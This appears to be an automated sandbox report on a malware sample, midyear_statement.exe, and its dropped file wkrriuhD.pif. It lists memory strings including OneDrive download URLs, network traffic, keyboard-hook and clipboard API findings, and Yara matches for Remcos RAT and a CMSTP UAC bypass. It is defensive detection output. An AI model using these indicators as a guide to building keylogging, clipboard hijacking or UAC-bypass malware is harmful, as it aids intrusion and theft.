Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-07-50-22/PreSignInSettingsConfig.json
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=d75433bcf1f9312f1975
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=ad62f4
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.co
Source: Dhuirrkw.PIF, 00000020.00000002.1638568341.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21262&authkey=
Source: Dhuirrkw.PIF, 00000020.00000003.1616842718.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21263&authkey=
Source: Dhuirrkw.PIF, 00000020.00000002.1639873625.0000000003C12000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=653A5056738F1A02%21264&authkey=
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: wkrriuhD.pif, 00000018.00000002.3665873791.0000000015C60000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001D.00000002.1388519475.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wkrriuhD.pif	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv348F.tmp.27.dr	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49734 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233A2B8 SetWindowsHookExA 0000000D,1233A2A4,00000000

24_2_1233A2B8

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wkrriuhD.pif

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,

24_2_1233B70E

Contains functionality to modify clipboard data

Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 24_2_123468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,	24_2_123468C1
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	27_2_0040987A
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 27_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	27_2_004098E2
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	28_2_00406DFC
Source: C:\Users\Public\Libraries\wkrriuhD.pif	Code function: 28_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	28_2_00406E9F

Contains functionality to read the clipboard data

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233B70E OpenClipboard,GetClipboardData,CloseClipboard,

24_2_1233B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1233A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

24_2_1233A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Code function: 24_2_1234C9E2 SystemParametersInfoW,

24_2_1234C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Abnormal high CPU Usage

Source: C:\Users\Public\Libraries\wkrriuhD.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BCD1C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_040BCD1C
Source: C:\Users\user\Desktop\midyear_statement.exe	Code function: 0_2_040BCE00 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_040BCE00
